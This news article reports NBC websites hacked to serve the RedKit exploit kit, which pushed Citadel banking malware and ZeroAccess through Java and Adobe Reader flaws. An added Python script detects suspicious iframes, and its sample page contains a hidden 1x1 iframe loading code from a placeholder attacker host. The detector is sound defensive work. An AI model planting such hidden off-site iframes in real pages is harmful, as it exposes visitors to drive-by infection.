NBC Websites Hacked To Serve Citadel Financial Malware

Published: 22/11/2024   Category: security




RedKit exploit kit launched drive-by malware attacks from NBC websites, targeted vulnerabilities in Java and Adobe Reader.



Multiple NBC websites were compromised by online attackers and used to launch drive-by attacks at visitors Thursday.

"At 16:43 CET [12:43 EST] this afternoon we noticed that the NBC.com website links to the redkit exploit kit that is spreading Citadel malware, targeting U.S. financials (sic) institutions," warned security analyst Barry Weymes at Dutch security firm Fox-IT in a Thursday blog post. This version of Citadel is only recognizable by 3 out of the 46 antivirus programs on virustotal.com.

Malware-spewing NBC websites included the sites for Late Night with Jimmy Fallon and Jay Leno's Garage, according to a blog posted by Tony Perez, COO of security software vendor Sucuri.

In short order, Google was blocking some NBC websites from search results, warning that they appeared to be infected with malware. While some reports suggested that NBC expunged the malware after just 15 minutes, multiple security researchers reported that the infections persisted for at least four hours.
Attackers appeared to have compromised the NBC websites using the RedKit attack toolkit, which then targeted users with attacks designed to exploit vulnerabilities in their Java browser plug-in or Adobe Reader. The remotely exploitable Java bug (CVE-2013-0422) being targeted was discovered in January and patched last month. Meanwhile, the malicious PDF file served up by the malware was recognized Friday morning by only six out of 46 antivirus software packages, according to VirusTotal. Initial reports on the attack from security researchers didn't disclose whether the Adobe Reader bug was a zero-day flaw or a previously discovered bug.

The iframe used in the attack called on an ever-changing list of external URLs to load attack code. "This tells us that something on the server is generating the payload," said Sucuri's Perez in his Thursday blog post. "This isn't an uncommon practice; it also tells us that the script is likely still on the box. The fact that it's impacting other sites tells us that the compromise might extend beyond the Web application and onto the server. If those other sites are stored on separate boxes then we're looking at a much bigger, network, compromise, but that is speculative at the moment."
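The injected iframe that Perez describes, one that pulls attack code from hosts outside the site, is the kind of change a routine page-integrity check can surface. The Python script below is an added example written for this page; it is not code from the article, Fox-IT or Sucuri. It parses a page's HTML, flags any iframe whose `src` points at a host outside the site's own domain, and separately flags frames that are hidden via CSS or sized 1x1, since legitimate embeds are rarely invisible. The sample HTML and the host `attacker-host.invalid` are constructed placeholders, not indicators from the incident.

```python
"""Site-integrity check: find iframes that load content from off-site hosts
or that are hidden from the visitor. Added example, not the article's code."""

from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample page: one legitimate same-origin video embed and one
# hidden, off-site iframe of the kind the article describes. The attacker
# host is a placeholder, not a real indicator from the NBC incident.
SAMPLE_HTML = """
<html><body>
<h1>Show page</h1>
<iframe src="https://www.example.com/player?id=42" width="640" height="360"></iframe>
<div style="position:absolute;left:-9999px">
<iframe src="http://attacker-host.invalid/redirector.php" width="1" height="1"
        style="visibility:hidden"></iframe>
</div>
</body></html>
"""


class IframeCollector(HTMLParser):
    """Collect the attribute dict of every <iframe> start tag in the page."""

    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        # HTMLParser lowercases attribute names; values may be None.
        if tag.lower() == "iframe":
            self.iframes.append(dict(attrs))


def _tiny(value):
    """True when a width/height attribute is 1px or smaller."""
    try:
        return int(str(value).lower().rstrip("px")) <= 1
    except ValueError:
        return False


def _is_hidden(attrs):
    """True for display:none / visibility:hidden styles or 1x1 frames."""
    style = (attrs.get("style") or "").replace(" ", "").lower()
    if "display:none" in style or "visibility:hidden" in style:
        return True
    return _tiny(attrs.get("width")) and _tiny(attrs.get("height"))


def find_suspicious_iframes(html, site_host):
    """Return a list of findings for iframes that are off-site or hidden.

    site_host is the domain the page legitimately belongs to (e.g. "example.com");
    subdomains of it are treated as same-site, relative URLs as same-site.
    """
    parser = IframeCollector()
    parser.feed(html)
    findings = []
    for attrs in parser.iframes:
        src = attrs.get("src") or ""
        host = urlparse(src).hostname or site_host  # relative src => same site
        reasons = []
        if not (host == site_host or host.endswith("." + site_host)):
            reasons.append("off-site host %s" % host)
        if _is_hidden(attrs):
            reasons.append("hidden or 1x1 frame")
        if reasons:
            findings.append({"src": src, "host": host, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for finding in find_suspicious_iframes(SAMPLE_HTML, "example.com"):
        print("SUSPICIOUS iframe %s (%s)" % (finding["src"], "; ".join(finding["reasons"])))
```

Run against a saved copy of each page on a schedule and diff the findings against the previous run: a frame that is both off-site and hidden, as in the constructed sample, is worth an immediate look at the server, which is where Perez's comments locate the real compromise.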
By infecting a high-profile site such as NBC.com, which is one of the top 600 most popular sites in the United States, attackers had the opportunity to quickly infect numerous visitors. Targeting media and news websites can vastly improve an attacker's chances of success, according to Weymes at Fox-IT, which was one of the first organizations to spot the attack. "Users presume these large organizations' websites to be free from malware. If an attacker can gain access to these Web servers, they can use them to distribute malware to every visitor of that Web server."

Attackers made the most of their exploit window, using RedKit to target PCs with up to three different malware payloads, including the Citadel crimeware toolkit, which is designed to steal financial information. According to Fox-IT, the attackers were targeting account details for numerous U.S. financial institutions, including American Express, Bank of America, Chase, Citibank, Citizensbank Online, Fifth Third Bank, Navy Federal Credit Union, PNC, Schwab, Suntrust, TD Ameritrade, USAA and Wells Fargo.

The drive-by NBC website attacks also infected some visitors with ZeroAccess malware, which is used to launch clickjacking attacks that generate fake pay-per-click revenues for botnet controllers or their clients. "ZeroAccess is a dangerous threat that uses stealth techniques in order to hinder its detection and removal," said SurfRight security researcher Erik Loman in a blog post.

RedKit served up a third piece of malware which has yet to be identified. "Some antivirus vendors identify this malware as Zbot or a rootkit ... but it is most definitely not Zbot and it's not a rootkit either," Loman said. The malware binary has a curious name at the end, SadokBdi, which may connect it to previously seen malware known as Sadok.

The timing of the high-profile NBC attack may be tied to Oracle and Adobe having recently released patches for multiple critical vulnerabilities in Java, Reader and Acrobat. Once vendors release a patch, criminals often reverse-engineer the fix to reveal the underlying vulnerability, which they then begin targeting. Anyone who doesn't quickly update their software thus remains highly vulnerable to having their PC compromised by an attacker, which can lead to their personal financial account information being stolen, keystrokes recorded and their PC being made to serve as part of a botnet.

Owing to many users failing to update the Java Runtime Environment installed on their PCs, Java bugs in particular remain quite popular with -- and effective for -- attackers.
